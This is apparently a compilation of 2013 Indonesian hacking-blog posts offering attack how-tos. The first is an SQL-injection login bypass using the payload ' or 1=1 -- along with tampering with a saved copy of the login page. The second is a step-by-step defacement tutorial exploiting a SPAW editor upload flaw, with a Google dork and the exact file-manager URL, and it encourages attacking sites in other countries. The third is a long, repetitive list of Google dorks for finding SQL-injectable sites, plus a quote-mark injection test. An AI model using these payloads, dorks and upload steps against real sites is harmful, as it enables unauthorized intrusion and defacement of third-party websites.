0

HACK WEBSITE

Senin, 21 Oktober 2013
STERP BY STEP
  1. 1
    Open the site you want to hack. Provide wrong username/password combination in its log in form. (e.g. : Username : me and Password: ' or 1=1 --)An error will occur saying wrong username-password. Now be prepared your experiment starts from here.
  2. 2
    Right click anywhere on that error page =>> go to view source.
  3. 3
    There you can see the HTML coding with JavaScript.• There you find somewhat like this....<_form action="...Login....">• Before this login information copy the URL of the site in which you are. (e.g. :"< _form..........action=http://www.targetwebsite.com/login.......>")
  4. 4
    Then delete the JavaScript from the above that validates your information in the server.(Do this very carefully, your success to hack the site depends upon this i.e. how efficiently you delete the java scripts that validate your account information)
  5. 5
    Then take a close look for "<_input name="password" type="password">"[without quotes] -> replace "<_type=text> “there instead of "<_type=password>". See there if maximum length of password is less than 11 then increase it to 11 (e.g. : if then write )
  6. 6
    Just go to file => save as and save it anywhere in your hard disk with ext.html(e.g.: c:\chan.html)
  7. 7
    Reopen your target web page by double clicking 'chan.html' file that you saved in your hard disk earlier.• You see that some changes in current page as compared to original One. Don't worry.
  8. 8
    Provide any username [e.g.: hacker] and password [e.g.:' or 1=1 --] You have successfully cracked the above website and entered into the account of List user saved in the server's database.
0

Cara Mendeface Website dengan Spaw Uploads Vulnerability

Jumat, 11 Oktober 2013
Hallo sobat, Kali ini saya mau share tutorial deface sob, nama teknik defacenya yaitu Deface Website Melalui Spaw Uploads Vulnerability.
karena kemaren ada yang request deface web.
tapi di sini saya hanya kasi tau cara deface web hanya untuk web , tetapi untuk html deface nya anda bisa cari sendiri di google .

Yaudah deh, dari pada lama-lama ngoceh ngga jelas, mending langsung ke tkp aja gan. Berikut Cara Deface Website Melalui Spaw Uploads Vulnerability Cekidot :D

1). Pertama, Masukan Dorknya :
inurl:”spaw2/uploads/files/”
 Setelah sobat memasukan dork diatas dikotak pencarian google, pilih salah satu web yang mau dideface. Tapi ingat, ngga semua website bisa dideface :p

Notes : Dorknya bisa kalian ubah menurut kreativitas kalian masing-masing, contoh saya tambahkan site:th pada akhir dork diatas. Jadi hasilnya begini :

inurl:”spaw2/uploads/files/” site:th
Maksud dari site:th adalah domain negara asal website yang akan kita serang, "site:th" asal kata Thailand, jadi website yang akan kita serang semuanya website Thailand. Kalian juga bisa mengganti dengan domain negara lain, misalnya site:com.my, site:jp, site:gov.cn etc asal jangansite:co.id yah !

2). Setelah sobat masuk kedalam websitenya, sobat liat Url di addressbar. Contoh Urlnya :

http://contoh.com/spaw2/uploads/files/ 

3). Ganti pada Bagian
/spaw2/uploads/files/ dengan kode dibawah ini :

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf


Sehingga Menjadi Seperti Ini :

http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf





4). Tekan Enter, Nanti akan Terbuka Seperti Ini :



5). Selanjutnya Liat Terus Gambar, Karena Tutorial ada Didalam Gambar.



6). Next, Pilih File Deface'an Sobat, Lalu klik Open dan Tunggu Hingga Loading Selesai.




7). Selanjutnya Klik Tombol Upload.



8). Jika Proses Upload Selesai, Nanti akan Muncul Daftar File dan diantaranya ada File yang sobat upload tadi.



9). Selesai, dan lihat Hasilnya
0

Kumpulan Dork Untuk Mendeface Website

Kumpulan Dork Untuk Mendeface Website


Kumpulan Dork Untuk Deface Website











Dork SQL :

intext:"error in your SQL syntax" +site:my
intext:"mysql_num_rows()" +site:il
intext:"mysql_fetch_array()" +site:br
intext:"Error Occurred While Processing Request" +site:il
intext:"Server Error in '/' Application" +site:my
intext:"Microsoft OLE DB Provider for ODBC Drivers error" +site:br
intext:"Invalid Querystring" +site:my
intext:"OLE DB Provider for ODBC" +site:my
intext:"VBScript Runtime" +site:my
intext:"ADODB.Field" +site:my
intext:"BOF or EOF"+site:my intext:"ADODB.Command" +site:my intext:"JET Database" +site:my
intext:"mysql_fetch_row()" +site:my intext:"Syntax error" +site:my intext:"include()" +site:my
intext:"mysql_fetch_assoc()" +site:my intext:"mysql_fetch_object()" +site:my intext:"mysql_numrows()" +site:il
intext:"GetArray()" +site:my intext:"FetchRow()" +site:my
intext:"Input string was not in a correct format" +site:my

allinurl:xml.php?id=
allinurl:xml.php?code=
allinurl:xml.php?code= module_ID=

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
nurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id= inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:trainers.php?id=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:newsDetail.php?id=
inurl:staff_id=
inurl:historialeer.php?num=
inurl:product-item.php?id=
inurl:news_view.php?id=
inurl:humor.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:chappies.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gery.php?id=
inurl:detail.php?ID=
inurl:publications.php?id=
inurl:Productinfo.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id= section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:channel_id=
inurl:newsid=
inurl:news_display.php?getid=
inurl:ages.php?id=
inurl:clanek.php4?id=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:look.php?ID=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:offer.php?idf=

"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: session_start()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: array_merge()
"id=" & intext:"Warning: preg_match()
"id=" & intext:"Warning: ilesize()
"id=" & intext:"Warning: filesize()

inurl:index.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:newsitem.php?num=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl: forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:announce.php?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:newsone.php?id=
inurl:product-item.php?id=
inurl:pages.php?id=
inurl:clanek.php4?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:galeri_info.php?l=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:aboutbook.php?id=

"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: is_writable()
"id=" & intext:"Warning: Unknown()
"id=" & intext:"Warning: mysql_result()
"id=" & intext:"Warning: pg_exec()
"id=" & intext:"Warning: require()
Untuk mengetahui vulnerability'nya, anda tambahkan tanda petik ' pada belakang url dari hasil dork tersebut. Misal www.site.com/curriculum.php?id=30' atau www.site.com/curriculum.php?id='30 jika ditemui tulisan seperti syntax error berarti web tersebut dapat kita eksekusi
Selamat Bereksperimen :D